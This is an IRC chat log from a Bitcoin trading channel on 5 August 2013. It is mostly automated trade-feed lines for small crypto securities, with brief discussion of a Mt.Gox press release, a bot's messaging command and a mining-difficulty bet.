Aug 05 09:54:06 https://www.mtgox.com/press_release_20130805.html Aug 05 09:54:07 Mt.Gox - Bitcoin Exchange Aug 05 09:54:37 lulzy too... "new engine at over 500,000 trades per second" Aug 05 09:55:00 the akamai bit will be nice on MtGox Aug 05 09:55:46 Wish they would bring on litecoin soon (been stockpiling @ >35LTC/BTC Aug 05 09:56:13 no engine/cdn will help them when they can't get banking right Aug 05 09:56:47 Oh I don't want fiat, I just want increased BTC<-->LTC liquidity Aug 05 09:56:59 [BTCTC] [LABCOIN] 15 @ 0.001429 = 0.0214 BTC [-] Aug 05 09:58:04 [BTCTC] [LABCOIN] 124 @ 0.001458 = 0.1808 BTC [+] Aug 05 09:58:05 [BTCTC] [LABCOIN] 376 @ 0.001459 = 0.5486 BTC [+] Aug 05 09:59:01 [BTCTC] [DMS.MINING] 49 @ 0.00865 = 0.4239 BTC [+] Aug 05 10:01:35 [BTCTC] [BMF] 5 @ 0.0447 = 0.2235 BTC [+] Aug 05 10:02:35 they say: "Finally, the issues with deposits and withdrawals from Mt. Gox are being relieved, but still not at the rate we want." and then "it was always like that" and then "The risk is now too high for us to credit accounts prematurely." ... x.x Aug 05 10:04:56 [BTCTC] [DMS.PURCHASE] 900 @ 0.02824 = 25.416 BTC [+] Aug 05 10:05:15 [BTCTC] [LABCOIN] 50 @ 0.001416 = 0.0708 BTC [-] Aug 05 10:05:16 [BTCTC] [LABCOIN] 6 @ 0.001415 = 0.0085 BTC [-] Aug 05 10:05:18 [BTCTC] [LABCOIN] 55 @ 0.001412 = 0.0777 BTC [-] Aug 05 10:05:19 [BTCTC] [LABCOIN] 444 @ 0.001411 = 0.6265 BTC [-] Aug 05 10:05:20 [BTCTC] [LABCOIN] 1 @ 0.00139 BTC [-] Aug 05 10:05:21 [BTCTC] [LABCOIN] 6 @ 0.001387 = 0.0083 BTC [-] Aug 05 10:05:23 [BTCTC] [LABCOIN] 50 @ 0.001386 = 0.0693 BTC [-] Aug 05 10:05:31 [BTCTC] [LABCOIN] 3605 @ 0.001343 = 4.8415 BTC [-] Aug 05 10:06:59 [BTCTC] [LABCOIN] 50 @ 0.001456 = 0.0728 BTC [+] Aug 05 10:07:00 [BTCTC] [LABCOIN] 32 @ 0.001457 = 0.0466 BTC [+] Aug 05 10:07:01 [BTCTC] [LABCOIN] 18 @ 0.001458 = 0.0262 BTC [+] Aug 05 10:08:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.03995 = 0.2797 BTC [+] Aug 05 10:08:53 [BTCTC] [TAT.ASICMINER] 42 @ 0.03996 = 1.6783 BTC [+] Aug 05 10:10:45 jurov lol Aug 05 10:11:06 dexX7 they have a long history of outright lieing in their press releases. Aug 05 10:11:12 i know Aug 05 10:11:12 pretty much bfl-style. Aug 05 10:12:16 [BTCTC] [TAT.MINIGAME] 49 @ 0.000254 = 0.0124 BTC [-] Aug 05 10:12:20 but what was written there is "we did improve, ... it was always like that and oh wait, we it's even worse now" Aug 05 10:12:26 ;;later tell exocyst if you're looking for explanations as to why the "mining stocks" ie scams have been deflating the past days it has absolutely nothing to do with any wsj article. Aug 05 10:12:27 The operation succeeded. Aug 05 10:12:32 doesn't make much sense Aug 05 10:12:37 ;;later tell exocyst it's on trilema. Aug 05 10:12:38 The operation succeeded. Aug 05 10:12:51 dexX7 yeah. Aug 05 10:12:55 ;;tell dexX7 hi Aug 05 10:13:05 format is ;;later tell Aug 05 10:13:25 gribble whispered the message to me Aug 05 10:13:32 but thanks :) Aug 05 10:13:41 ;;later tell dexX7 hi Aug 05 10:13:41 The operation succeeded. Aug 05 10:13:43 well ya cause you're on Aug 05 10:13:51 but the later part works if you're offline. which makes it useful. Aug 05 10:13:58 ah i see Aug 05 10:16:36 [BTCTC] [BTCGARDEN] 99 @ 0.01588 = 1.5721 BTC [-] Aug 05 10:16:37 [BTCTC] [BTCGARDEN] 358 @ 0.01589 = 5.6886 BTC [+] Aug 05 10:16:39 [BTCTC] [BTCGARDEN] 485 @ 0.0159 = 7.7115 BTC [+] Aug 05 10:16:40 [BTCTC] [BTCGARDEN] 8 @ 0.01594 = 0.1275 BTC [+] Aug 05 10:16:54 [BTCTC] [LABCOIN] 29 @ 0.001457 = 0.0423 BTC [-] Aug 05 10:17:16 ;;later tell dexX7_ :) Aug 05 10:17:17 The operation succeeded. Aug 05 10:25:08 [BTCTC] [ACTIVEMINING] 50 @ 0.005321 = 0.2661 BTC [-] Aug 05 10:27:34 [BTCTC] [ASICMINER-PT] 5 @ 4 = 20 BTC [-] Aug 05 10:27:55 cusipzzz: click on decision/tpr tab - ridiculous - http://blog.fightmetric.com/2013/08/davis-vs-machida-official-ufc-statistics.html Aug 05 10:28:16 [BTCTC] [TAT.MINIGAME] 9 @ 0.000254 = 0.0023 BTC [-] Aug 05 10:28:18 [BTCTC] [TAT.MINIGAME] 4491 @ 0.00024 = 1.0778 BTC [-] Aug 05 10:28:28 wc Aug 05 10:28:53 [BTCTC] [ACTIVEMINING] 170 @ 0.00532 = 0.9044 BTC [-] Aug 05 10:30:29 [BTCTC] [LABCOIN] 212 @ 0.001495 = 0.3169 BTC [+] Aug 05 10:30:39 does the price usually go down sunday night? Aug 05 10:31:01 dandate2: yes, except when it doesn't Aug 05 10:31:47 which is just proof that it does anyway. Aug 05 10:32:02 [BTCTC] [LABCOIN] 50 @ 0.001431 = 0.0716 BTC [-] Aug 05 10:32:03 [BTCTC] [LABCOIN] 5000 @ 0.001431 = 7.155 BTC [-] Aug 05 10:32:05 [BTCTC] [LABCOIN] 9626 @ 0.00143 = 13.7652 BTC [-] Aug 05 10:32:19 ;ticker Aug 05 10:33:33 [BTCTC] [ACTIVEMINING] 50 @ 0.005121 = 0.2561 BTC [-] Aug 05 10:33:35 [BTCTC] [ACTIVEMINING] 25 @ 0.00512 = 0.128 BTC [-] Aug 05 10:33:36 [BTCTC] [ACTIVEMINING] 50 @ 0.005116 = 0.2558 BTC [-] Aug 05 10:33:37 [BTCTC] [BTCGARDEN] 1 @ 0.01526 BTC [-] Aug 05 10:33:38 [BTCTC] [ACTIVEMINING] 70 @ 0.005101 = 0.3571 BTC [-] Aug 05 10:33:39 [BTCTC] [BTCGARDEN] 8 @ 0.01525 = 0.122 BTC [-] Aug 05 10:33:41 [BTCTC] [BTCGARDEN] 11 @ 0.01521 = 0.1673 BTC [-] Aug 05 10:33:41 [BTCTC] [BTCGARDEN] 90 @ 0.0152 = 1.368 BTC [-] Aug 05 10:33:42 [BTCTC] [BTCGARDEN] 30 @ 0.01505 = 0.4515 BTC [-] Aug 05 10:33:43 [BTCTC] [BTCGARDEN] 65 @ 0.01504 = 0.9776 BTC [-] Aug 05 10:34:35 [HAVELOCK] [XBOND] 22 @ 0.00104995 = 0.0231 BTC [+] Aug 05 10:34:38 [HAVELOCK] [XBOND] 55 @ 0.00104996 = 0.0577 BTC [+] Aug 05 10:34:40 [HAVELOCK] [XBOND] 7 @ 0.00104997 = 0.0073 BTC [+] Aug 05 10:34:42 [HAVELOCK] [XBOND] 916 @ 0.00104998 = 0.9618 BTC [+] Aug 05 10:34:45 [BTCTC] [ASICMINER-PT] 7 @ 4 = 28 BTC [-] Aug 05 10:34:46 [BTCTC] [DMS.MINING] 59 @ 0.008661 = 0.511 BTC [+] Aug 05 10:34:48 [BTCTC] [DMS.MINING] 100 @ 0.008662 = 0.8662 BTC [+] Aug 05 10:34:49 [BTCTC] [DMS.MINING] 132 @ 0.008669 = 1.1443 BTC [+] Aug 05 10:34:49 [BTCTC] [DMS.MINING] 106 @ 0.009 = 0.954 BTC [+] Aug 05 10:35:04 [BTCTC] [LABCOIN] 50 @ 0.001491 = 0.0746 BTC [+] Aug 05 10:35:05 [BTCTC] [LABCOIN] 2050 @ 0.001492 = 3.0586 BTC [+] Aug 05 10:35:07 [BTCTC] [ASICMINER-PT] 1 @ 3.961 BTC [-] Aug 05 10:35:10 [BTCTC] [ASICMINER-PT] 1 @ 3.96 BTC [-] Aug 05 10:35:32 my portfolio got trashed doh Aug 05 10:35:40 [BTCTC] [BTCGARDEN] 8 @ 0.01504 = 0.1203 BTC [-] Aug 05 10:35:45 dcx is down 4.61% in the last 9h http://dcx.smidge.com/ Aug 05 10:35:59 [BTCTC] [LABCOIN] 50 @ 0.001431 = 0.0716 BTC [-] Aug 05 10:36:01 [BTCTC] [LABCOIN] 9 @ 0.001431 = 0.0129 BTC [-] Aug 05 10:36:02 [BTCTC] [LABCOIN] 384 @ 0.00143 = 0.5491 BTC [-] Aug 05 10:36:33 !t m s.mpoe Aug 05 10:36:34 [MPEX:S.MPOE] 1D: 0.00082101 / 0.00082803 / 0.00083323 (178390 shares, 147.71 BTC), 7D: 0.0007936 / 0.00081325 / 0.00083323 (2174192 shares, 1,768.18 BTC), 30D: 0.0007725 / 0.00082027 / 0.00097228 (10530316 shares, 8,637.75 BTC) Aug 05 10:36:42 my portfolio is fine Aug 05 10:37:09 [BTCTC] [LABCOIN] 50 @ 0.001431 = 0.0716 BTC [+] Aug 05 10:37:11 [BTCTC] [LABCOIN] 2950 @ 0.00143 = 4.2185 BTC [-] Aug 05 10:38:59 [BTCTC] [LABCOIN] 1 @ 0.001482 BTC [+] Aug 05 10:39:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.03996 BTC [+] Aug 05 10:39:51 [BTCTC] [ASICMINER-PT] 4 @ 4 = 16 BTC [+] Aug 05 10:40:52 [BTCTC] [DMS.PURCHASE] 62 @ 0.02824 = 1.7509 BTC [+] Aug 05 10:41:55 [BTCTC] [LABCOIN] 50 @ 0.001431 = 0.0716 BTC [-] Aug 05 10:41:55 [BTCTC] [LABCOIN] 4188 @ 0.00143 = 5.9888 BTC [-] Aug 05 10:43:04 [BTCTC] [LABCOIN] 50 @ 0.001431 = 0.0716 BTC [+] Aug 05 10:43:06 [BTCTC] [LABCOIN] 1055 @ 0.00143 = 1.5087 BTC [-] Aug 05 10:44:32 [BTCTC] [LABCOIN] 50 @ 0.001431 = 0.0716 BTC [+] Aug 05 10:44:34 [BTCTC] [LABCOIN] 150 @ 0.00143 = 0.2145 BTC [-] Aug 05 10:44:57 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Aug 05 10:45:06 [BTCTC] [DMS.SELLING] 2 @ 0.0215 = 0.043 BTC [-] Aug 05 10:46:18 [BTCTC] [LABCOIN] 400 @ 0.00143 = 0.572 BTC [-] Aug 05 10:48:48 [BTCTC] [LABCOIN] 1000 @ 0.00143 = 1.43 BTC [-] Aug 05 10:50:14 [BTCTC] [DMS.SELLING] 2 @ 0.0215 = 0.043 BTC [-] Aug 05 10:50:25 [BTCTC] [LABCOIN] 10000 @ 0.00143 = 14.3 BTC [-] Aug 05 10:50:35 [BTCTC] [LABCOIN] 15 @ 0.001439 = 0.0216 BTC [+] Aug 05 10:50:38 [BTCTC] [LABCOIN] 200 @ 0.00143 = 0.286 BTC [-] Aug 05 10:53:31 [BTCTC] [LABCOIN] 2000 @ 0.00143 = 2.86 BTC [-] Aug 05 10:53:48 [BTCTC] [LABCOIN] 1800 @ 0.00143 = 2.574 BTC [-] Aug 05 10:54:04 [BTCTC] [LABCOIN] 1247 @ 0.00143 = 1.7832 BTC [-] Aug 05 10:56:34 [BTCTC] [LABCOIN] 50 @ 0.001358 = 0.0679 BTC [-] Aug 05 11:03:53 [BTCTC] [BTCGARDEN] 1 @ 0.01584 BTC [+] Aug 05 11:03:55 [BTCTC] [BTCGARDEN] 12 @ 0.01585 = 0.1902 BTC [+] Aug 05 11:03:56 [BTCTC] [BTCGARDEN] 61 @ 0.0159 = 0.9699 BTC [+] Aug 05 11:03:57 [BTCTC] [BTCGARDEN] 494 @ 0.01591 = 7.8595 BTC [+] Aug 05 11:03:58 [BTCTC] [BTCGARDEN] 125 @ 0.01594 = 1.9925 BTC [+] Aug 05 11:03:59 [BTCTC] [BTCGARDEN] 1000 @ 0.01595 = 15.95 BTC [+] Aug 05 11:04:00 [BTCTC] [BTCGARDEN] 31 @ 0.01596 = 0.4948 BTC [+] Aug 05 11:04:02 [BTCTC] [BTCGARDEN] 255 @ 0.01597 = 4.0724 BTC [+] Aug 05 11:04:03 [BTCTC] [BTCGARDEN] 299 @ 0.01599 = 4.781 BTC [+] Aug 05 11:04:03 [BTCTC] [BTCGARDEN] 20 @ 0.01599 = 0.3198 BTC [+] Aug 05 11:04:04 [BTCTC] [BTCGARDEN] 1702 @ 0.016 = 27.232 BTC [+] Aug 05 11:05:26 [BTCTC] [BTCGARDEN] 81 @ 0.016 = 1.296 BTC [+] Aug 05 11:10:30 [BTCTC] [BTCGARDEN] 52 @ 0.01599 = 0.8315 BTC [-] Aug 05 11:10:31 [BTCTC] [BTCGARDEN] 548 @ 0.016 = 8.768 BTC [+] Aug 05 11:13:18 [BTCTC] [BTCGARDEN] 65 @ 0.016 = 1.04 BTC [+] Aug 05 11:13:19 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 05 11:13:21 [BTCTC] [BTCGARDEN] 51 @ 0.01604 = 0.818 BTC [+] Aug 05 11:13:22 [BTCTC] [BTCGARDEN] 84 @ 0.01605 = 1.3482 BTC [+] Aug 05 11:14:36 [BTCTC] [LABCOIN] 50 @ 0.001353 = 0.0677 BTC [-] Aug 05 11:14:37 [BTCTC] [LABCOIN] 3 @ 0.001354 = 0.0041 BTC [+] Aug 05 11:14:39 [BTCTC] [LABCOIN] 118 @ 0.001357 = 0.1601 BTC [+] Aug 05 11:14:40 [BTCTC] [LABCOIN] 829 @ 0.001358 = 1.1258 BTC [+] Aug 05 11:15:04 [BTCTC] [ACTIVEMINING] 50 @ 0.005273 = 0.2637 BTC [+] Aug 05 11:16:36 [BTCTC] [ACTIVEMINING] 6 @ 0.005273 = 0.0316 BTC [+] Aug 05 11:16:37 [BTCTC] [ACTIVEMINING] 50 @ 0.005274 = 0.2637 BTC [+] Aug 05 11:16:39 [BTCTC] [ACTIVEMINING] 1 @ 0.005557 BTC [+] Aug 05 11:16:40 [BTCTC] [ACTIVEMINING] 43 @ 0.005606 = 0.2411 BTC [+] Aug 05 11:18:13 [BTCTC] [BTCGARDEN] 196 @ 0.01605 = 3.1458 BTC [+] Aug 05 11:18:22 [BTCTC] [BTCGARDEN] 20 @ 0.01605 = 0.321 BTC [+] Aug 05 11:18:25 [BTCTC] [BTCGARDEN] 40 @ 0.01605 = 0.642 BTC [+] Aug 05 11:20:19 [BTCTC] [LABCOIN] 50 @ 0.001355 = 0.0678 BTC [-] Aug 05 11:20:20 [BTCTC] [LABCOIN] 121 @ 0.001358 = 0.1643 BTC [+] Aug 05 11:27:28 [BTCTC] [BTCGARDEN] 9 @ 0.01605 = 0.1445 BTC [+] Aug 05 11:30:52 [BTCTC] [LABCOIN] 5 @ 0.001449 = 0.0072 BTC [+] Aug 05 11:31:44 [MPEX] [S.MPOE] 7100 @ 0.0008184 = 5.8106 BTC [-] Aug 05 11:39:27 [BTCTC] [LABCOIN] 50 @ 0.001428 = 0.0714 BTC [-] Aug 05 11:39:29 [BTCTC] [LABCOIN] 1343 @ 0.001429 = 1.9191 BTC [+] Aug 05 11:39:30 [BTCTC] [LABCOIN] 174 @ 0.001435 = 0.2497 BTC [+] Aug 05 11:39:31 [BTCTC] [LABCOIN] 2 @ 0.00144 = 0.0029 BTC [+] Aug 05 11:39:31 [BTCTC] [LABCOIN] 20 @ 0.001441 = 0.0288 BTC [+] Aug 05 11:39:32 [BTCTC] [LABCOIN] 500 @ 0.001448 = 0.724 BTC [+] Aug 05 11:39:34 [BTCTC] [LABCOIN] 125 @ 0.001449 = 0.1811 BTC [+] Aug 05 11:39:35 [BTCTC] [LABCOIN] 1003 @ 0.00145 = 1.4544 BTC [+] Aug 05 11:39:36 [BTCTC] [LABCOIN] 1 @ 0.001492 BTC [+] Aug 05 11:39:37 [BTCTC] [LABCOIN] 1000 @ 0.001493 = 1.493 BTC [+] Aug 05 11:39:59 [BTCTC] [ACTIVEMINING] 50 @ 0.005201 = 0.2601 BTC [-] Aug 05 11:40:00 [BTCTC] [ACTIVEMINING] 30 @ 0.0052 = 0.156 BTC [-] Aug 05 11:40:28 [BTCTC] [BTCGARDEN] 20 @ 0.01514 = 0.3028 BTC [-] Aug 05 11:42:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.03988 BTC [-] Aug 05 11:44:10 [BTCTC] [DMS.PURCHASE] 1 @ 0.02824 BTC [+] Aug 05 11:44:44 [BTCTC] [BFMINES] 2 @ 0.004 = 0.008 BTC [+] Aug 05 11:45:19 [MPEX] [S.MPOE] 600 @ 0.0008184 = 0.491 BTC [-] Aug 05 11:47:00 [BTCTC] [BTCGARDEN] 9 @ 0.01604 = 0.1444 BTC [+] Aug 05 11:49:29 [BTCTC] [RSM] 226 @ 0.01097 = 2.4792 BTC [-] Aug 05 11:49:30 [BTCTC] [RSM] 1 @ 0.01098 BTC [+] Aug 05 11:49:31 [BTCTC] [RSM] 10 @ 0.01098 = 0.1098 BTC [+] Aug 05 11:50:03 [BTCTC] [LABCOIN] 50 @ 0.001541 = 0.0771 BTC [+] Aug 05 11:50:06 [BTCTC] [DMS.MINING] 6 @ 0.008213 = 0.0493 BTC [-] Aug 05 11:51:19 [BTCTC] [LABCOIN] 5950 @ 0.001541 = 9.169 BTC [+] Aug 05 11:51:27 [BTCTC] [DMS.PURCHASE] 20 @ 0.02824 = 0.5648 BTC [+] Aug 05 11:52:38 [BTCTC] [ACTIVEMINING] 50 @ 0.005207 = 0.2604 BTC [+] Aug 05 11:53:51 [BTCTC] [LABCOIN] 30 @ 0.001538 = 0.0461 BTC [-] Aug 05 11:56:21 [BTCTC] [LABCOIN] 1 @ 0.001501 BTC [-] Aug 05 11:58:52 [BTCTC] [BTCGARDEN] 116 @ 0.01604 = 1.8606 BTC [+] Aug 05 12:01:10 [BTCTC] [RSM] 1 @ 0.01111 BTC [+] Aug 05 12:02:26 [MPEX] [S.MPOE] 13398 @ 0.00081597 = 10.9324 BTC [-] Aug 05 12:04:01 [BTCTC] [LABCOIN] 2 @ 0.00152 = 0.003 BTC [+] Aug 05 12:07:39 [BTCTC] [LABCOIN] 8 @ 0.00152 = 0.0122 BTC [+] Aug 05 12:09:20 [BTCTC] [DMS.SELLING] 6 @ 0.0215 = 0.129 BTC [-] Aug 05 12:09:21 [BTCTC] [DMS.SELLING] 20 @ 0.0215 = 0.43 BTC [-] Aug 05 12:11:36 [BTCTC] [DMS.SELLING] 71 @ 0.0216 = 1.5336 BTC [+] Aug 05 12:12:07 [HAVELOCK] [AM100] 1 @ 0.03890001 BTC [-] Aug 05 12:12:08 [HAVELOCK] [AM100] 3 @ 0.0389 = 0.1167 BTC [-] Aug 05 12:12:11 [HAVELOCK] [AM100] 6 @ 0.03880002 = 0.2328 BTC [-] Aug 05 12:12:13 [HAVELOCK] [AM100] 41 @ 0.03880001 = 1.5908 BTC [-] Aug 05 12:14:01 [BTCTC] [LABCOIN] 100 @ 0.0015 = 0.15 BTC [-] Aug 05 12:14:03 [BTCTC] [LABCOIN] 900 @ 0.001425 = 1.2825 BTC [-] Aug 05 12:18:16 [BTCTC] [LABCOIN] 50 @ 0.001432 = 0.0716 BTC [+] Aug 05 12:18:18 [BTCTC] [LABCOIN] 2590 @ 0.001431 = 3.7063 BTC [-] Aug 05 12:22:40 [BTCTC] [LABCOIN] 50 @ 0.001453 = 0.0727 BTC [+] Aug 05 12:22:41 [BTCTC] [LABCOIN] 11 @ 0.001452 = 0.016 BTC [-] Aug 05 12:22:43 [BTCTC] [LABCOIN] 40 @ 0.00145 = 0.058 BTC [-] Aug 05 12:24:09 [BTCTC] [LABCOIN] 50 @ 0.001451 = 0.0726 BTC [+] Aug 05 12:25:35 [BTCTC] [LABCOIN] 2 @ 0.001451 = 0.0029 BTC [+] Aug 05 12:27:07 [BTCTC] [LABCOIN] 50 @ 0.001506 = 0.0753 BTC [+] Aug 05 12:27:08 [BTCTC] [LABCOIN] 3450 @ 0.001507 = 5.1992 BTC [+] Aug 05 12:27:52 [BTCTC] [LABCOIN] 50 @ 0.001504 = 0.0752 BTC [-] Aug 05 12:27:54 [BTCTC] [LABCOIN] 40 @ 0.001505 = 0.0602 BTC [+] Aug 05 12:27:55 [BTCTC] [LABCOIN] 847 @ 0.001508 = 1.2773 BTC [+] Aug 05 12:27:57 [BTCTC] [LABCOIN] 125 @ 0.001509 = 0.1886 BTC [+] Aug 05 12:27:58 [BTCTC] [LABCOIN] 3 @ 0.00151 = 0.0045 BTC [+] Aug 05 12:27:59 [BTCTC] [LABCOIN] 935 @ 0.00151 = 1.4119 BTC [+] Aug 05 12:28:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.03984 BTC [-] Aug 05 12:28:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.03984 BTC [-] Aug 05 12:28:10 [BTCTC] [TAT.ASICMINER] 6 @ 0.03985 = 0.2391 BTC [+] Aug 05 12:28:31 [BTCTC] [LABCOIN] 14 @ 0.001508 = 0.0211 BTC [-] Aug 05 12:28:32 [BTCTC] [LABCOIN] 50 @ 0.001509 = 0.0755 BTC [+] Aug 05 12:28:33 [BTCTC] [LABCOIN] 65 @ 0.00151 = 0.0982 BTC [+] Aug 05 12:28:34 [BTCTC] [LABCOIN] 421 @ 0.001514 = 0.6374 BTC [+] Aug 05 12:36:09 [BTCTC] [BTCGARDEN] 1 @ 0.01598 BTC [-] Aug 05 12:36:46 [BTCTC] [LABCOIN] 50 @ 0.001457 = 0.0729 BTC [-] Aug 05 12:37:10 [BTCTC] [LABCOIN] 50 @ 0.001457 = 0.0729 BTC [-] Aug 05 12:37:44 [BTCTC] [LABCOIN] 50 @ 0.001457 = 0.0729 BTC [-] Aug 05 12:40:30 [BTCTC] [DMS.SELLING] 57 @ 0.0216 = 1.2312 BTC [+] Aug 05 12:40:31 [BTCTC] [DMS.MINING] 12 @ 0.008213 = 0.0986 BTC [-] Aug 05 12:40:32 [BTCTC] [DMS.MINING] 2 @ 0.008212 = 0.0164 BTC [-] Aug 05 12:42:06 [BTCTC] [DMS.MINING] 154 @ 0.008051 = 1.2399 BTC [-] Aug 05 12:42:07 [BTCTC] [DMS.MINING] 40 @ 0.00805 = 0.322 BTC [-] Aug 05 12:42:08 [BTCTC] [DMS.MINING] 2 @ 0.00805 = 0.0161 BTC [-] Aug 05 12:42:09 [BTCTC] [DMS.MINING] 100 @ 0.00801 = 0.801 BTC [-] Aug 05 12:42:09 [BTCTC] [DMS.MINING] 28 @ 0.008 = 0.224 BTC [-] Aug 05 12:42:11 [BTCTC] [DMS.MINING] 4 @ 0.008 = 0.032 BTC [-] Aug 05 12:42:12 [BTCTC] [DMS.MINING] 1 @ 0.008 BTC [-] Aug 05 12:42:13 [BTCTC] [DMS.MINING] 36 @ 0.008 = 0.288 BTC [-] Aug 05 12:42:30 [BTCTC] [DMS.MINING] 15 @ 0.008052 = 0.1208 BTC [+] Aug 05 12:42:31 [BTCTC] [DMS.MINING] 64 @ 0.008 = 0.512 BTC [-] Aug 05 12:42:33 [BTCTC] [DMS.MINING] 11 @ 0.008 = 0.088 BTC [-] Aug 05 12:42:51 [BTCTC] [DMS.SELLING] 118 @ 0.02073 = 2.4461 BTC [-] Aug 05 12:42:52 [BTCTC] [DMS.SELLING] 20 @ 0.02073 = 0.4146 BTC [-] Aug 05 12:42:54 [BTCTC] [DMS.SELLING] 100 @ 0.02072 = 2.072 BTC [-] Aug 05 12:42:55 [BTCTC] [DMS.SELLING] 56 @ 0.02071 = 1.1598 BTC [-] Aug 05 12:42:55 [BTCTC] [DMS.SELLING] 71 @ 0.02071 = 1.4704 BTC [-] Aug 05 12:43:10 [BTCTC] [DMS.MINING] 18 @ 0.008 = 0.144 BTC [-] Aug 05 12:43:14 [BTCTC] [DMS.SELLING] 29 @ 0.02071 = 0.6006 BTC [-] Aug 05 12:43:15 [BTCTC] [DMS.SELLING] 106 @ 0.0207 = 2.1942 BTC [-] Aug 05 12:44:03 [BTCTC] [DMS.PURCHASE] 600 @ 0.02824 = 16.944 BTC [+] Aug 05 12:45:18 [BTCTC] [DMS.MINING] 4 @ 0.007961 = 0.0318 BTC [-] Aug 05 12:45:20 [BTCTC] [DMS.MINING] 2 @ 0.007863 = 0.0157 BTC [-] Aug 05 12:45:21 [BTCTC] [DMS.MINING] 894 @ 0.007863 = 7.0295 BTC [-] Aug 05 12:45:54 [BTCTC] [LABCOIN] 13 @ 0.001505 = 0.0196 BTC [+] Aug 05 12:46:28 smide: you're here? Aug 05 12:49:45 [BTCTC] [DMS.MINING] 106 @ 0.007863 = 0.8335 BTC [-] Aug 05 12:49:47 [BTCTC] [DMS.MINING] 12 @ 0.007862 = 0.0943 BTC [-] Aug 05 12:49:49 [BTCTC] [DMS.MINING] 390 @ 0.007861 = 3.0658 BTC [-] Aug 05 12:53:43 yes Aug 05 12:56:33 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.0027 = 0.081 BTC [+] Aug 05 13:10:57 [MPEX] [S.MPOE] 4902 @ 0.00081597 = 3.9999 BTC [-] Aug 05 13:22:29 [BTCTC] [DMS.MINING] 50 @ 0.0079 = 0.395 BTC [+] Aug 05 13:22:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.03999 = 0.16 BTC [+] Aug 05 13:23:39 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [+] Aug 05 13:25:01 [BTCTC] [BTCGARDEN] 8 @ 0.01598 = 0.1278 BTC [-] Aug 05 13:31:44 [BTCTC] [LABCOIN] 1 @ 0.001466 BTC [-] Aug 05 13:33:46 [BTCTC] [BTCGARDEN] 62 @ 0.01598 = 0.9908 BTC [-] Aug 05 13:33:53 [BTCTC] [TAT.MINIGAME] 1 @ 0.000241 BTC [+] Aug 05 13:33:55 [BTCTC] [TAT.MINIGAME] 30 @ 0.00024 = 0.0072 BTC [-] Aug 05 13:33:56 [BTCTC] [TAT.MINIGAME] 223 @ 0.0002202 = 0.0491 BTC [-] Aug 05 13:34:58 ;;bc,stats Aug 05 13:35:00 Current Blocks: 250340 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1659 blocks | Next Difficulty In About: 1 week, 1 day, 20 hours, 55 minutes, and 11 seconds | Next Difficulty Estimate: 46703622.2462 | Estimated Percent Change: 24.90015 Aug 05 13:35:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0027 BTC [+] Aug 05 13:35:48 [BTCTC] [BTCGARDEN] 67 @ 0.01599 = 1.0713 BTC [+] Aug 05 13:36:50 [HAVELOCK] [XBOND] 91 @ 0.00104998 = 0.0955 BTC [+] Aug 05 13:37:05 [BTCTC] [ACTIVEMINING] 10 @ 0.005239 = 0.0524 BTC [+] Aug 05 13:37:16 [BTCTC] [BTCGARDEN] 45 @ 0.01598 = 0.7191 BTC [-] Aug 05 13:37:59 [BTCTC] [ACTIVEMINING] 1 @ 0.005236 BTC [-] Aug 05 13:38:21 [BTCTC] [BTCGARDEN] 14 @ 0.01598 = 0.2237 BTC [-] Aug 05 13:40:42 [HAVELOCK] [AM100] 4 @ 0.0388 = 0.1552 BTC [-] Aug 05 13:42:25 [BTCTC] [DMS.PURCHASE] 300 @ 0.02824 = 8.472 BTC [+] Aug 05 13:44:56 [MPEX] [S.MPOE] 2098 @ 0.00081651 = 1.713 BTC [+] Aug 05 13:45:49 https://btct.co/security/CB.IDIFF-O bids have been placed Aug 05 13:45:51 BTC-TC: BTC Trading Corp - View Security Aug 05 13:46:03 [BTCTC] [LABCOIN] 1 @ 0.001489 BTC [+] Aug 05 13:51:15 [BTCTC] [ACTIVEMINING] 25 @ 0.005153 = 0.1288 BTC [-] Aug 05 13:54:03 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002212 BTC [+] Aug 05 13:57:34 so CB.IDIFF-O is basically a bet that difficulty will be over 79 million? Aug 05 13:59:21 yes, for long investors Aug 05 13:59:37 for me and for short investors, it's a bet it will be lower Aug 05 13:59:40 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [+] Aug 05 14:00:52 ;;calc 78/79 Aug 05 14:00:52 0.987341772152 Aug 05 14:00:54 I see - you would get the money now but pay back later, hopefully less Aug 05 14:01:32 yes. and it isn't binary bet, if diff is only 78 million, you a still get 98% back. Aug 05 14:01:39 of course Aug 05 14:01:57 it's very ingenious :) Aug 05 14:02:34 took me a while to actually get it - or at least "why it works" Aug 05 14:02:42 send thanks to mircea_popescu. but i improved it a bit by specifying clear limit. Aug 05 14:03:26 hi all Aug 05 14:03:32 hi mjr_ Aug 05 14:05:31 [BTCTC] [LABCOIN] 50 @ 0.00147 = 0.0735 BTC [-] Aug 05 14:06:39 [BTCTC] [LABCOIN] 50 @ 0.00147 = 0.0735 BTC [-] Aug 05 14:07:57 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002602 = 0.026 BTC [-] Aug 05 14:07:59 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002601 = 0.0052 BTC [-] Aug 05 14:08:00 [BTCTC] [TAT.VIRTUALMINE] 156 @ 0.0025 = 0.39 BTC [-] Aug 05 14:08:00 did you hear the news about avalon? Aug 05 14:08:00 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0025 BTC [-] Aug 05 14:08:01 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002496 = 0.0125 BTC [-] Aug 05 14:08:02 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00239 = 0.0096 BTC [-] Aug 05 14:08:03 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.002301 = 0.0069 BTC [-] Aug 05 14:08:14 yes Aug 05 14:08:27 pretty amazing Aug 05 14:08:46 i mean, actually mind boggling Aug 05 14:10:31 [BTCTC] 